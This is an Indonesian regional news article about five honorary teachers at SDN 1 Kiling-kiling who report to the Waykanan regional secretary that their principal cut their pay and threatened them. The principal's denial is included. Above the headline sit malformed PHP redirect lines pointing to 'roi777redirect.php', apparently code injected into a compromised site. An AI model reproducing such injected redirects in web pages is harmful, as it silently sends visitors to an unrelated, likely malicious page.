header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Gajih Di Potong !!!, Guru Honorer SDN 1 Kiling-kiling Datangi Sekda Waykanan -
Gajih Di Potong !!!, Guru Honorer SDN 1 Kiling-kiling Datangi Sekda Waykanan

TRANSLAMPUNG.COM, BLAMBANGAN UMPU – Lima Guru Honorer SDN Kiling-kiling mendatangi Skretaris Daerah Kabupaten waykanan Saipul S.sos, untuk meminta bantuan perihal adanya pemotongan gajih dan mengintimidasi para guru honorer yang diduga dilakukan oleh kepala sekolah SDN Kiling-kiling M.Saleh, kedatangan kelima guru tersebut di terima sekda diruang kerjanya, Senin (9/4)

Kelima guru honorer yang mendatangi sekda yaitu, Eka sahputra, Tursila, Permaisuri 1, Permaisuri 2, Dan Rodi putra.

Salah satu guru Eka Saputra menuturkan , kedatangan mereka menghadap sekda untuk meminta bantuan dan keadilan supaya dapat memberikan apa yang menjadi hak mereka, serta memberikan tindakan tegas atas perlakuan Kepala sekolah yang memotong gajih dan mengintimidasi mereka.

“iya kami kesini mau melaporkan dan minta bantuan kepada pak sekda atas perlakuan kepala sekolah kami yang telah memotong gajih dan mengintimidasi kami, kami juga sudah membuat Surat pernyataan perihal kejadian ini,” ujar eka.

Di tempat yang sama, Skretaris Daerah Kabupaten waykanan Saipul, S.sos. Mengatakan sudah menerima keterangan dari para guru honorer, dan saat ini dia sudah memerintahkan Kabid SD Dinas pendidikan untuk memanggil kepala sekolah yang bersangkutan untuk di mintai keterangan lalu melaporkannya ke Inspektorat untuk di proses.

“saya sudah perintahkan Kabid SD Dinas pendidikan supaya memanggil kepala sekolah nya untuk mencari apa sebenarnya permasalahannya dan mencari solusi nya, kemudian atas pengajuan mereka juga saya sudah laporankan ke Inspektorat supaya di proses sesuai ketentuannya,” Kata Sekda.

Dihubungi melalui telepon, Kepala sekolah SDN Kiling-kiling M.Saleh membantah keras kalau dirinya telah melakukan pemotongan gajih dan mengintimidasi para Guru honorer, bahkan dia menyatakan siap di panggil dan memberikan keterangan serta memberikan bukti bukti pengambilan gajih atas Kelima guru honorer itu.

“itu tidak benar ya, justru saya menduga kalau ini ada unsur balas dendam yang dilakukan oleh salah satu suami guru honorer yang bekerja sama saya,” Tandasnya.

Di beritakan sebelum, Bahwa kepala sekolah SDN 1 Kiling-kiling M. Saleh diduga telah melakukan pemotongan Gajih guru honorer Pada Triwulan pertama pada tahun 2018, selain itu Kepala sekolah juga diduga melakukan intimidasi terhadap Guru Honorer jika tidak mau menandatangani dan mengambil gajih tersebut maka mereka di ancam di berhentikan. (migo)

News Reporter